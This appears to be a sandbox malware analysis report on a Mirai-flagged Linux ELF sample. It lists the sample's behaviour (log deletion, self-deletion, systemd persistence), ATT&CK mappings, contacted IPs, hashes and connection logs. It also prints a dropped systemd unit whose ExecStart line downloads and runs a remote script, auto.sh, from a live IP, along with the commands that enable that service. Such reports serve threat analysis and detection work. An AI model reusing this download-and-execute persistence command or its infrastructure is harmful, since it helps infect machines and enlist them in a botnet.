Source: /tmp/i586.elf (PID: 6263)File opened: /proc/28/cmdlineJump to behavior
Source: /tmp/i586.elf (PID: 6263)File opened: /proc/29/cmdlineJump to behavior
Source: /tmp/i586.elf (PID: 6263)File opened: /proc/491/cmdlineJump to behavior
Source: /tmp/i586.elf (PID: 6263)File opened: /proc/250/cmdlineJump to behavior
Source: /tmp/i586.elf (PID: 6263)File opened: /proc/130/cmdlineJump to behavior
Source: /tmp/i586.elf (PID: 6263)File opened: /proc/251/cmdlineJump to behavior
Source: /tmp/i586.elf (PID: 6263)File opened: /proc/252/cmdlineJump to behavior
Source: /tmp/i586.elf (PID: 6263)File opened: /proc/132/cmdlineJump to behavior
Source: /tmp/i586.elf (PID: 6263)File opened: /proc/253/cmdlineJump to behavior
Source: /tmp/i586.elf (PID: 6263)File opened: /proc/4507/cmdlineJump to behavior
Source: /tmp/i586.elf (PID: 6263)File opened: /proc/254/cmdlineJump to behavior
Source: /tmp/i586.elf (PID: 6263)File opened: /proc/255/cmdlineJump to behavior
Source: /tmp/i586.elf (PID: 6263)File opened: /proc/256/cmdlineJump to behavior
Source: /tmp/i586.elf (PID: 6263)File opened: /proc/1599/cmdlineJump to behavior
Source: /tmp/i586.elf (PID: 6263)File opened: /proc/257/cmdlineJump to behavior
Source: /tmp/i586.elf (PID: 6263)File opened: /proc/1477/cmdlineJump to behavior
Source: /tmp/i586.elf (PID: 6263)File opened: /proc/379/cmdlineJump to behavior
Source: /tmp/i586.elf (PID: 6263)File opened: /proc/258/cmdlineJump to behavior
Source: /tmp/i586.elf (PID: 6263)File opened: /proc/1476/cmdlineJump to behavior
Source: /tmp/i586.elf (PID: 6263)File opened: /proc/259/cmdlineJump to behavior
Source: /tmp/i586.elf (PID: 6263)File opened: /proc/1475/cmdlineJump to behavior
Source: /tmp/i586.elf (PID: 6263)File opened: /proc/6249/cmdlineJump to behavior
Source: /tmp/i586.elf (PID: 6263)File opened: /proc/6248/cmdlineJump to behavior
Source: /tmp/i586.elf (PID: 6263)File opened: /proc/936/cmdlineJump to behavior
Source: /tmp/i586.elf (PID: 6263)File opened: /proc/30/cmdlineJump to behavior
Source: /tmp/i586.elf (PID: 6263)File opened: /proc/2208/cmdlineJump to behavior
Source: /tmp/i586.elf (PID: 6263)File opened: /proc/6263/cmdlineJump to behavior
Source: /tmp/i586.elf (PID: 6263)File opened: /proc/35/cmdlineJump to behavior
Source: /tmp/i586.elf (PID: 6263)File opened: /proc/1809/cmdlineJump to behavior
Source: /tmp/i586.elf (PID: 6263)File opened: /proc/1494/cmdlineJump to behavior
Source: /tmp/i586.elf (PID: 6267)Shell command executed: sh -c "systemctl daemon-reload"Jump to behavior
Source: /tmp/i586.elf (PID: 6284)Shell command executed: sh -c "systemctl enable startup_command.service"Jump to behavior
Source: /bin/sh (PID: 6269)Systemctl executable: /usr/bin/systemctl -> systemctl daemon-reloadJump to behavior
Source: /bin/sh (PID: 6285)Systemctl executable: /usr/bin/systemctl -> systemctl enable startup_command.serviceJump to behavior

Hooking and other Techniques for Hiding and Protection

barindex
Source: /tmp/i586.elf (PID: 6265)Log files deleted: /var/log/kern.logJump to behavior
Source: /tmp/i586.elf (PID: 6263)File: /tmp/i586.elfJump to behavior
Source: /lib/systemd/systemd-hostnamed (PID: 6302)Queries kernel information via 'uname': Jump to behavior
Source: i586.elf, 6605.1.0000000008b42000.0000000008b4f000.rw-.sdmpBinary or memory string: /var/lib/vmwareXB
Source: i586.elf, 6605.1.0000000008b42000.0000000008b4f000.rw-.sdmpBinary or memory string: 4)/tmp/vmware-root_721-4290559889
Source: i586.elf, 6605.1.0000000008b42000.0000000008b4f000.rw-.sdmpBinary or memory string: )/var/lib/vmware/VGAuth/aliasStore
Source: i586.elf, 6605.1.0000000008b42000.0000000008b4f000.rw-.sdmpBinary or memory string: )/var/lib/vmware/VGAuth/aliasStore
Source: i586.elf, 6605.1.0000000008b42000.0000000008b4f000.rw-.sdmpBinary or memory string: /tmp/vmware-root_721-4290559889
Source: i586.elf, 6605.1.0000000008b40000.0000000008b42000.rw-.sdmpBinary or memory string: )/tmp/vmware-root_721-4290559889(
Source: i586.elf, 6605.1.0000000008b42000.0000000008b4f000.rw-.sdmpBinary or memory string: /var/lib/vmware
Source: i586.elf, 6605.1.0000000008b42000.0000000008b4f000.rw-.sdmpBinary or memory string: !/var/lib/vmware
Source: i586.elf, 6605.1.0000000008b42000.0000000008b4f000.rw-.sdmpBinary or memory string: /var/lib/vmware/VGAuth
Source: i586.elf, 6605.1.0000000008b42000.0000000008b4f000.rw-.sdmpBinary or memory string: /var/lib/PackageKit!/var/lib/NetworkManager !/var/lib/vmware/VGAuth
Source: i586.elf, 6605.1.0000000008b42000.0000000008b4f000.rw-.sdmpBinary or memory string: /var/lib/vmware/VGAuth/aliasStore
Source: i586.elf, 6605.1.0000000008b42000.0000000008b4f000.rw-.sdmpBinary or memory string: !/var/lib/vmware/VGAuth
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information2
Scripting
Valid AccountsWindows Management Instrumentation1
Systemd Service
1
Systemd Service
1
Hidden Files and Directories
1
OS Credential Dumping
11
Security Software Discovery
Remote ServicesData from Local System1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/Job2
Scripting
Boot or Logon Initialization Scripts1
Indicator Removal
LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media1
Non-Standard Port
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
File Deletion
Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive1
Non-Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture2
Application Layer Protocol
Traffic DuplicationData Destruction
No configs have been found
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Number of created Files
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1583211 Sample: i586.elf Startdate: 02/01/2025 Architecture: LINUX Score: 72 43 tcpdown.su 2->43 45 109.202.202.202, 80 INIT7CH Switzerland 2->45 47 4 other IPs or domains 2->47 49 Malicious sample detected (through community Yara rule) 2->49 51 Multi AV Scanner detection for submitted file 2->51 53 Machine Learning detection for sample 2->53 9 i586.elf 2->9         started        12 gnome-session-binary sh gsd-rfkill 2->12         started        14 systemd snapd-env-generator 2->14         started        16 4 other processes 2->16 signatures3 process4 signatures5 59 Sample deletes itself 9->59 18 i586.elf 9->18         started        process6 process7 20 i586.elf 18->20         started        23 i586.elf sh 18->23         started        25 i586.elf sh 18->25         started        27 i586.elf 18->27         started        signatures8 55 Manipulation of devices in /dev 20->55 57 Deletes system log files 20->57 29 i586.elf 20->29         started        31 i586.elf 20->31         started        33 i586.elf 20->33         started        41 41 other processes 20->41 35 sh systemctl 23->35         started        37 sh systemctl 25->37         started        39 i586.elf 27->39         started        process9
SourceDetectionScannerLabelLink
i586.elf53%VirustotalBrowse
i586.elf58%ReversingLabsLinux.Trojan.Mirai
i586.elf100%Joe Sandbox ML
No Antivirus matches
No Antivirus matches
No Antivirus matches
NameIPActiveMaliciousAntivirus DetectionReputation
tcpdown.su
45.200.149.167
truefalse
    high
    tcpdown.su
    unknown
    unknowntrue
      unknown
      tcpdown.su
      unknown
      unknowntrue
        unknown
        tcpdown.su
        unknown
        unknowntrue
          unknown
          tcpdown.su
          unknown
          unknowntrue
            unknown
            NameSourceMaliciousAntivirus DetectionReputation
            http://154.216.18.192/auto.shstartup_command.service.13.drfalse
              high
              http://154.216.18.192/auto.sh;i586.elf, startup_command.service.13.drfalse
                high
                • No. of IPs < 25%
                • 25% < No. of IPs < 50%
                • 50% < No. of IPs < 75%
                • 75% < No. of IPs
                IPDomainCountryFlagASNASN NameMalicious
                107.175.130.16
                unknownUnited States
                36352AS-COLOCROSSINGUSfalse
                45.200.149.167
                tcpdown.suSeychelles
                328608Africa-on-Cloud-ASZAfalse
                109.202.202.202
                unknownSwitzerland
                13030INIT7CHfalse
                91.189.91.43
                unknownUnited Kingdom
                41231CANONICAL-ASGBfalse
                91.189.91.42
                unknownUnited Kingdom
                41231CANONICAL-ASGBfalse
                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                107.175.130.16m68k.elfGet hashmaliciousUnknownBrowse
                  sparc.elfGet hashmaliciousUnknownBrowse
                    i686.elfGet hashmaliciousUnknownBrowse
                      arm.elfGet hashmaliciousUnknownBrowse
                        arm5.elfGet hashmaliciousUnknownBrowse
                          arm.elfGet hashmaliciousUnknownBrowse
                            arm5.elfGet hashmaliciousUnknownBrowse
                              45.200.149.167sparc.elfGet hashmaliciousUnknownBrowse
                                x86_64.elfGet hashmaliciousUnknownBrowse
                                  mips.elfGet hashmaliciousUnknownBrowse
                                    mpsl.elfGet hashmaliciousUnknownBrowse
                                      mpsl.elfGet hashmaliciousUnknownBrowse
                                        mips.elfGet hashmaliciousUnknownBrowse
                                          109.202.202.202kpLwzBouH4.elfGet hashmaliciousUnknownBrowse
                                          • ch.archive.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_92.0%2bbuild3-0ubuntu0.20.04.1_amd64.deb
                                          91.189.91.43x86_64.elfGet hashmaliciousUnknownBrowse
                                            socat.elfGet hashmaliciousUnknownBrowse
                                              arm5.elfGet hashmaliciousUnknownBrowse
                                                wrjkngh4.elfGet hashmaliciousMiraiBrowse
                                                  woega6.elfGet hashmaliciousMiraiBrowse
                                                    arm5.elfGet hashmaliciousMiraiBrowse
                                                      m68k.elfGet hashmaliciousMiraiBrowse
                                                        bot.m68k.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
                                                          bot.arm.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
                                                            i.elfGet hashmaliciousUnknownBrowse
                                                              91.189.91.42x86_64.elfGet hashmaliciousUnknownBrowse
                                                                socat.elfGet hashmaliciousUnknownBrowse
                                                                  arm5.elfGet hashmaliciousUnknownBrowse
                                                                    ngwa5.elfGet hashmaliciousMiraiBrowse
                                                                      wrjkngh4.elfGet hashmaliciousMiraiBrowse
                                                                        woega6.elfGet hashmaliciousMiraiBrowse
                                                                          arm5.elfGet hashmaliciousMiraiBrowse
                                                                            arm6.elfGet hashmaliciousMiraiBrowse
                                                                              m68k.elfGet hashmaliciousMiraiBrowse
                                                                                bot.m68k.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                  tcpdown.susparc.elfGet hashmaliciousUnknownBrowse
                                                                                  • 45.200.149.95
                                                                                  x86_64.elfGet hashmaliciousUnknownBrowse
                                                                                  • 45.200.149.95
                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                  CANONICAL-ASGBx86_64.elfGet hashmaliciousUnknownBrowse
                                                                                  • 91.189.91.42
                                                                                  socat.elfGet hashmaliciousUnknownBrowse
                                                                                  • 91.189.91.42
                                                                                  arm5.elfGet hashmaliciousUnknownBrowse
                                                                                  • 91.189.91.42
                                                                                  ngwa5.elfGet hashmaliciousMiraiBrowse
                                                                                  • 91.189.91.42
                                                                                  wrjkngh4.elfGet hashmaliciousMiraiBrowse
                                                                                  • 91.189.91.42
                                                                                  gnjqwpc.elfGet hashmaliciousMiraiBrowse
                                                                                  • 185.125.190.26
                                                                                  woega6.elfGet hashmaliciousMiraiBrowse
                                                                                  • 91.189.91.42
                                                                                  arm5.elfGet hashmaliciousMiraiBrowse
                                                                                  • 91.189.91.42
                                                                                  arm6.elfGet hashmaliciousMiraiBrowse
                                                                                  • 91.189.91.42
                                                                                  m68k.elfGet hashmaliciousMiraiBrowse
                                                                                  • 91.189.91.42
                                                                                  Africa-on-Cloud-ASZAsparc.elfGet hashmaliciousUnknownBrowse
                                                                                  • 45.200.149.249
                                                                                  i686.elfGet hashmaliciousUnknownBrowse
                                                                                  • 45.200.149.249
                                                                                  x86_64.elfGet hashmaliciousUnknownBrowse
                                                                                  • 45.200.149.249
                                                                                  arm.elfGet hashmaliciousUnknownBrowse
                                                                                  • 45.200.149.96
                                                                                  mips.elfGet hashmaliciousUnknownBrowse
                                                                                  • 45.200.149.249
                                                                                  arm5.elfGet hashmaliciousUnknownBrowse
                                                                                  • 45.200.149.249
                                                                                  mpsl.elfGet hashmaliciousUnknownBrowse
                                                                                  • 45.200.149.249
                                                                                  DF2.exeGet hashmaliciousUnknownBrowse
                                                                                  • 45.200.148.158
                                                                                  mpsl.elfGet hashmaliciousUnknownBrowse
                                                                                  • 45.200.149.249
                                                                                  mips.elfGet hashmaliciousUnknownBrowse
                                                                                  • 45.200.149.249
                                                                                  AS-COLOCROSSINGUSm68k.elfGet hashmaliciousUnknownBrowse
                                                                                  • 107.175.130.16
                                                                                  sparc.elfGet hashmaliciousUnknownBrowse
                                                                                  • 104.168.33.8
                                                                                  i686.elfGet hashmaliciousUnknownBrowse
                                                                                  • 107.175.130.16
                                                                                  x86_64.elfGet hashmaliciousUnknownBrowse
                                                                                  • 104.168.33.8
                                                                                  arm.elfGet hashmaliciousUnknownBrowse
                                                                                  • 107.175.130.16
                                                                                  mips.elfGet hashmaliciousUnknownBrowse
                                                                                  • 104.168.33.8
                                                                                  arm5.elfGet hashmaliciousUnknownBrowse
                                                                                  • 107.175.130.16
                                                                                  mpsl.elfGet hashmaliciousUnknownBrowse
                                                                                  • 104.168.33.8
                                                                                  mpsl.elfGet hashmaliciousUnknownBrowse
                                                                                  • 104.168.33.8
                                                                                  arm.elfGet hashmaliciousUnknownBrowse
                                                                                  • 23.94.37.42
                                                                                  INIT7CHx86_64.elfGet hashmaliciousUnknownBrowse
                                                                                  • 109.202.202.202
                                                                                  socat.elfGet hashmaliciousUnknownBrowse
                                                                                  • 109.202.202.202
                                                                                  arm5.elfGet hashmaliciousUnknownBrowse
                                                                                  • 109.202.202.202
                                                                                  ngwa5.elfGet hashmaliciousMiraiBrowse
                                                                                  • 109.202.202.202
                                                                                  wrjkngh4.elfGet hashmaliciousMiraiBrowse
                                                                                  • 109.202.202.202
                                                                                  woega6.elfGet hashmaliciousMiraiBrowse
                                                                                  • 109.202.202.202
                                                                                  arm5.elfGet hashmaliciousMiraiBrowse
                                                                                  • 109.202.202.202
                                                                                  arm6.elfGet hashmaliciousMiraiBrowse
                                                                                  • 109.202.202.202
                                                                                  m68k.elfGet hashmaliciousMiraiBrowse
                                                                                  • 109.202.202.202
                                                                                  bot.m68k.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
                                                                                  • 109.202.202.202
                                                                                  No context
                                                                                  No context
                                                                                  Process:/tmp/i586.elf
                                                                                  File Type:ASCII text
                                                                                  Category:dropped
                                                                                  Size (bytes):361
                                                                                  Entropy (8bit):5.140421405816541
                                                                                  Encrypted:false
                                                                                  SSDEEP:6:z8jvIERZAMzdK+KOnFfltZCrXb1vN16R1E/Ls7QkhILQmWA4Rv:z+vIERZAOK+PCrXpvL6vJ73GLHWrv
                                                                                  MD5:4D2C868F454B6C55731485CF0F886DC0
                                                                                  SHA1:032B125DE0A28DCEE8D8D25FBEEB56DB7F403F04
                                                                                  SHA-256:8C4AE1B82477698F3A8C273B439CB9079794AFB8FC33CD4DEF854936BA37EA2C
                                                                                  SHA-512:060B2413A0CB2DEC0DB059C190467B5CB0D76209EFFEA4AE3DE2701FA71429B811A6F7E11E813B26806CF72578D1F32B608A02A4CE670EC58B5B65433E3CF11D
                                                                                  Malicious:false
                                                                                  Reputation:moderate, very likely benign file
                                                                                  Preview:[Unit].Description=Startup Command.After=network.target..[Service].ExecStart=cd /tmp || cd /var/run || cd /mnt || cd /root || cd / || cd /home; wget http://154.216.18.192/auto.sh || busybox wget http://154.216.18.192/auto.sh || curl -O http://154.216.18.192/auto.sh; chmod 777 auto.sh; ./auto.sh (null).RemainAfterExit=yes..[Install].WantedBy=multi-user.target.
                                                                                  Process:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                                                                                  File Type:ASCII text
                                                                                  Category:dropped
                                                                                  Size (bytes):76
                                                                                  Entropy (8bit):3.7627880354948586
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:+M4VMPQnMLmPQ9JEcwwbn:+M4m4MixcZb
                                                                                  MD5:D86A1F5765F37989EB0EC3837AD13ECC
                                                                                  SHA1:D749672A734D9DEAFD61DCA501C6929EC431B83E
                                                                                  SHA-256:85889AB8222C947C58BE565723AE603CC1A0BD2153B6B11E156826A21E6CCD45
                                                                                  SHA-512:338C4B776FDCC2D05E869AE1F9DB64E6E7ECC4C621AB45E51DD07C73306BACBAD7882BE8D3ACF472CAEB30D4E5367F8793D3E006694184A68F74AC943A4B7C07
                                                                                  Malicious:false
                                                                                  Reputation:moderate, very likely benign file
                                                                                  Preview:PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin.
                                                                                  File type:ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, stripped
                                                                                  Entropy (8bit):6.283721160763472
                                                                                  TrID:
                                                                                  • ELF Executable and Linkable format (Linux) (4029/14) 50.16%
                                                                                  • ELF Executable and Linkable format (generic) (4004/1) 49.84%
                                                                                  File name:i586.elf
                                                                                  File size:70'796 bytes
                                                                                  MD5:a4308d0cf09d2f1bc259627e7b91252d
                                                                                  SHA1:4884f55dd9bf34015caab7ec130546fa9cb84a93
                                                                                  SHA256:cfd0be6379b1a3b95bfe58c8e724f246646fa07d94ab186f611f4d7b5e8e557c
                                                                                  SHA512:232a234d46787f2144de58b4ddf7cdd650b42173e01847bad4270a400ee445fb51cbf924e03093b8028c48a42c97c42e6e8cf7585506162ade2036b29e6f110f
                                                                                  SSDEEP:1536:yPQsRePYB4WZhMXaH96kOE1BqLoq19W1vlPmNta:yPtMPYB4WZhMXo1mLoq9+doI
                                                                                  TLSH:2A634AC5A643E8F5EC2616702133E7374772F03E112EDA87C765D932ACA6940EA1739C
                                                                                  File Content Preview:.ELF....................d...4...........4. ...(.....................\...\...........................................Q.td............................U..S.......w....h........[]...$.............U......=.....t..5....$......$.......u........t....h\...........

                                                                                  ELF header

                                                                                  Class:ELF32
                                                                                  Data:2's complement, little endian
                                                                                  Version:1 (current)
                                                                                  Machine:Intel 80386
                                                                                  Version Number:0x1
                                                                                  Type:EXEC (Executable file)
                                                                                  OS/ABI:UNIX - System V
                                                                                  ABI Version:0
                                                                                  Entry Point Address:0x8048164
                                                                                  Flags:0x0
                                                                                  ELF Header Size:52
                                                                                  Program Header Offset:52
                                                                                  Program Header Size:32
                                                                                  Number of Program Headers:3
                                                                                  Section Header Offset:70396
                                                                                  Section Header Size:40
                                                                                  Number of Section Headers:10
                                                                                  Header String Table Index:9
                                                                                  NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
                                                                                  NULL0x00x00x00x00x0000
                                                                                  .initPROGBITS0x80480940x940x1c0x00x6AX001
                                                                                  .textPROGBITS0x80480b00xb00xe0a60x00x6AX0016
                                                                                  .finiPROGBITS0x80561560xe1560x170x00x6AX001
                                                                                  .rodataPROGBITS0x80561800xe1800x2cdc0x00x2A0032
                                                                                  .ctorsPROGBITS0x80590000x110000x80x00x3WA004
                                                                                  .dtorsPROGBITS0x80590080x110080x80x00x3WA004
                                                                                  .dataPROGBITS0x80590200x110200x29c0x00x3WA0032
                                                                                  .bssNOBITS0x80592c00x112bc0xeb000x00x3WA0032
                                                                                  .shstrtabSTRTAB0x00x112bc0x3e0x00x0001
                                                                                  TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                                                                                  LOAD0x00x80480000x80480000x10e5c0x10e5c6.33680x5R E0x1000.init .text .fini .rodata
                                                                                  LOAD0x110000x80590000x80590000x2bc0xedc03.61790x6RW 0x1000.ctors .dtors .data .bss
                                                                                  GNU_STACK0x00x00x00x00x00.00000x6RW 0x4
                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                  Jan 2, 2025 08:51:49.106075048 CET43928443192.168.2.2391.189.91.42
                                                                                  Jan 2, 2025 08:51:49.298861027 CET435082601192.168.2.2345.200.149.167
                                                                                  Jan 2, 2025 08:51:49.303997993 CET26014350845.200.149.167192.168.2.23
                                                                                  Jan 2, 2025 08:51:49.304053068 CET435082601192.168.2.2345.200.149.167
                                                                                  Jan 2, 2025 08:51:49.304065943 CET435082601192.168.2.2345.200.149.167
                                                                                  Jan 2, 2025 08:51:49.308861017 CET26014350845.200.149.167192.168.2.23
                                                                                  Jan 2, 2025 08:51:49.308903933 CET435082601192.168.2.2345.200.149.167
                                                                                  Jan 2, 2025 08:51:49.313713074 CET26014350845.200.149.167192.168.2.23
                                                                                  Jan 2, 2025 08:51:50.187289953 CET26014350845.200.149.167192.168.2.23
                                                                                  Jan 2, 2025 08:51:50.187351942 CET435082601192.168.2.2345.200.149.167
                                                                                  Jan 2, 2025 08:51:50.187402010 CET435082601192.168.2.2345.200.149.167
                                                                                  Jan 2, 2025 08:51:54.737268925 CET42836443192.168.2.2391.189.91.43
                                                                                  Jan 2, 2025 08:51:55.862349987 CET570927722192.168.2.23107.175.130.16
                                                                                  Jan 2, 2025 08:51:55.867424965 CET772257092107.175.130.16192.168.2.23
                                                                                  Jan 2, 2025 08:51:55.867500067 CET570927722192.168.2.23107.175.130.16
                                                                                  Jan 2, 2025 08:51:55.867500067 CET570927722192.168.2.23107.175.130.16
                                                                                  Jan 2, 2025 08:51:55.867542982 CET570927722192.168.2.23107.175.130.16
                                                                                  Jan 2, 2025 08:51:55.872463942 CET772257092107.175.130.16192.168.2.23
                                                                                  Jan 2, 2025 08:51:55.894398928 CET570947722192.168.2.23107.175.130.16
                                                                                  Jan 2, 2025 08:51:55.899293900 CET772257094107.175.130.16192.168.2.23
                                                                                  Jan 2, 2025 08:51:55.899368048 CET570947722192.168.2.23107.175.130.16
                                                                                  Jan 2, 2025 08:51:55.901097059 CET570947722192.168.2.23107.175.130.16
                                                                                  Jan 2, 2025 08:51:55.901097059 CET570947722192.168.2.23107.175.130.16
                                                                                  Jan 2, 2025 08:51:55.905915976 CET772257094107.175.130.16192.168.2.23
                                                                                  Jan 2, 2025 08:51:55.914520025 CET772257092107.175.130.16192.168.2.23
                                                                                  Jan 2, 2025 08:51:55.950551987 CET772257094107.175.130.16192.168.2.23
                                                                                  Jan 2, 2025 08:51:56.017091990 CET4251680192.168.2.23109.202.202.202
                                                                                  Jan 2, 2025 08:51:56.057523966 CET570967722192.168.2.23107.175.130.16
                                                                                  Jan 2, 2025 08:51:56.062572956 CET772257096107.175.130.16192.168.2.23
                                                                                  Jan 2, 2025 08:51:56.062633991 CET570967722192.168.2.23107.175.130.16
                                                                                  Jan 2, 2025 08:51:56.062658072 CET570967722192.168.2.23107.175.130.16
                                                                                  Jan 2, 2025 08:51:56.062668085 CET570967722192.168.2.23107.175.130.16
                                                                                  Jan 2, 2025 08:51:56.067600965 CET772257096107.175.130.16192.168.2.23
                                                                                  Jan 2, 2025 08:51:56.114681959 CET772257096107.175.130.16192.168.2.23
                                                                                  Jan 2, 2025 08:51:56.130392075 CET570987722192.168.2.23107.175.130.16
                                                                                  Jan 2, 2025 08:51:56.135328054 CET772257098107.175.130.16192.168.2.23
                                                                                  Jan 2, 2025 08:51:56.135373116 CET570987722192.168.2.23107.175.130.16
                                                                                  Jan 2, 2025 08:51:56.135385990 CET570987722192.168.2.23107.175.130.16
                                                                                  Jan 2, 2025 08:51:56.135400057 CET570987722192.168.2.23107.175.130.16
                                                                                  Jan 2, 2025 08:51:56.140242100 CET772257098107.175.130.16192.168.2.23
                                                                                  Jan 2, 2025 08:51:56.182615042 CET772257098107.175.130.16192.168.2.23
                                                                                  Jan 2, 2025 08:51:56.242235899 CET772257092107.175.130.16192.168.2.23
                                                                                  Jan 2, 2025 08:51:56.242307901 CET570927722192.168.2.23107.175.130.16
                                                                                  Jan 2, 2025 08:51:56.266830921 CET772257094107.175.130.16192.168.2.23
                                                                                  Jan 2, 2025 08:51:56.266916037 CET570947722192.168.2.23107.175.130.16
                                                                                  Jan 2, 2025 08:51:56.433840990 CET772257096107.175.130.16192.168.2.23
                                                                                  Jan 2, 2025 08:51:56.433923006 CET570967722192.168.2.23107.175.130.16
                                                                                  Jan 2, 2025 08:51:56.518768072 CET772257098107.175.130.16192.168.2.23
                                                                                  Jan 2, 2025 08:51:56.518855095 CET570987722192.168.2.23107.175.130.16
                                                                                  Jan 2, 2025 08:51:59.047591925 CET571007722192.168.2.23107.175.130.16
                                                                                  Jan 2, 2025 08:51:59.052567959 CET772257100107.175.130.16192.168.2.23
                                                                                  Jan 2, 2025 08:51:59.052669048 CET571007722192.168.2.23107.175.130.16
                                                                                  Jan 2, 2025 08:51:59.052669048 CET571007722192.168.2.23107.175.130.16
                                                                                  Jan 2, 2025 08:51:59.052710056 CET571007722192.168.2.23107.175.130.16
                                                                                  Jan 2, 2025 08:51:59.057439089 CET772257100107.175.130.16192.168.2.23
                                                                                  Jan 2, 2025 08:51:59.098546028 CET772257100107.175.130.16192.168.2.23
                                                                                  Jan 2, 2025 08:51:59.418195963 CET772257100107.175.130.16192.168.2.23
                                                                                  Jan 2, 2025 08:51:59.418262959 CET571007722192.168.2.23107.175.130.16
                                                                                  Jan 2, 2025 08:52:00.344063997 CET571027722192.168.2.23107.175.130.16
                                                                                  Jan 2, 2025 08:52:00.348880053 CET772257102107.175.130.16192.168.2.23
                                                                                  Jan 2, 2025 08:52:00.348937988 CET571027722192.168.2.23107.175.130.16
                                                                                  Jan 2, 2025 08:52:00.348937988 CET571027722192.168.2.23107.175.130.16
                                                                                  Jan 2, 2025 08:52:00.348953009 CET571027722192.168.2.23107.175.130.16
                                                                                  Jan 2, 2025 08:52:00.353818893 CET772257102107.175.130.16192.168.2.23
                                                                                  Jan 2, 2025 08:52:00.376921892 CET571047722192.168.2.23107.175.130.16
                                                                                  Jan 2, 2025 08:52:00.381711006 CET772257104107.175.130.16192.168.2.23
                                                                                  Jan 2, 2025 08:52:00.381823063 CET571047722192.168.2.23107.175.130.16
                                                                                  Jan 2, 2025 08:52:00.381849051 CET571047722192.168.2.23107.175.130.16
                                                                                  Jan 2, 2025 08:52:00.381866932 CET571047722192.168.2.23107.175.130.16
                                                                                  Jan 2, 2025 08:52:00.386648893 CET772257104107.175.130.16192.168.2.23
                                                                                  Jan 2, 2025 08:52:00.398464918 CET772257102107.175.130.16192.168.2.23
                                                                                  Jan 2, 2025 08:52:00.410999060 CET571067722192.168.2.23107.175.130.16
                                                                                  Jan 2, 2025 08:52:00.415894032 CET772257106107.175.130.16192.168.2.23
                                                                                  Jan 2, 2025 08:52:00.415951967 CET571067722192.168.2.23107.175.130.16
                                                                                  Jan 2, 2025 08:52:00.415985107 CET571067722192.168.2.23107.175.130.16
                                                                                  Jan 2, 2025 08:52:00.415999889 CET571067722192.168.2.23107.175.130.16
                                                                                  Jan 2, 2025 08:52:00.420758009 CET772257106107.175.130.16192.168.2.23
                                                                                  Jan 2, 2025 08:52:00.430632114 CET772257104107.175.130.16192.168.2.23
                                                                                  Jan 2, 2025 08:52:00.466552973 CET772257106107.175.130.16192.168.2.23
                                                                                  Jan 2, 2025 08:52:00.721684933 CET772257102107.175.130.16192.168.2.23
                                                                                  Jan 2, 2025 08:52:00.721759081 CET571027722192.168.2.23107.175.130.16
                                                                                  Jan 2, 2025 08:52:00.757220030 CET772257104107.175.130.16192.168.2.23
                                                                                  Jan 2, 2025 08:52:00.757298946 CET571047722192.168.2.23107.175.130.16
                                                                                  Jan 2, 2025 08:52:00.796736956 CET772257106107.175.130.16192.168.2.23
                                                                                  Jan 2, 2025 08:52:00.796854973 CET571067722192.168.2.23107.175.130.16
                                                                                  Jan 2, 2025 08:52:05.238614082 CET571087722192.168.2.23107.175.130.16
                                                                                  Jan 2, 2025 08:52:05.243551970 CET772257108107.175.130.16192.168.2.23
                                                                                  Jan 2, 2025 08:52:05.243644953 CET571087722192.168.2.23107.175.130.16
                                                                                  Jan 2, 2025 08:52:05.243644953 CET571087722192.168.2.23107.175.130.16
                                                                                  Jan 2, 2025 08:52:05.243644953 CET571087722192.168.2.23107.175.130.16
                                                                                  Jan 2, 2025 08:52:05.248028994 CET571107722192.168.2.23107.175.130.16
                                                                                  Jan 2, 2025 08:52:05.248505116 CET772257108107.175.130.16192.168.2.23
                                                                                  Jan 2, 2025 08:52:05.252963066 CET772257110107.175.130.16192.168.2.23
                                                                                  Jan 2, 2025 08:52:05.253025055 CET571107722192.168.2.23107.175.130.16
                                                                                  Jan 2, 2025 08:52:05.253025055 CET571107722192.168.2.23107.175.130.16
                                                                                  Jan 2, 2025 08:52:05.253065109 CET571107722192.168.2.23107.175.130.16
                                                                                  Jan 2, 2025 08:52:05.257838011 CET772257110107.175.130.16192.168.2.23
                                                                                  Jan 2, 2025 08:52:05.290608883 CET772257108107.175.130.16192.168.2.23
                                                                                  Jan 2, 2025 08:52:05.298455954 CET772257110107.175.130.16192.168.2.23
                                                                                  Jan 2, 2025 08:52:05.615026951 CET772257108107.175.130.16192.168.2.23
                                                                                  Jan 2, 2025 08:52:05.615108967 CET571087722192.168.2.23107.175.130.16
                                                                                  Jan 2, 2025 08:52:05.617389917 CET772257110107.175.130.16192.168.2.23
                                                                                  Jan 2, 2025 08:52:05.617451906 CET571107722192.168.2.23107.175.130.16
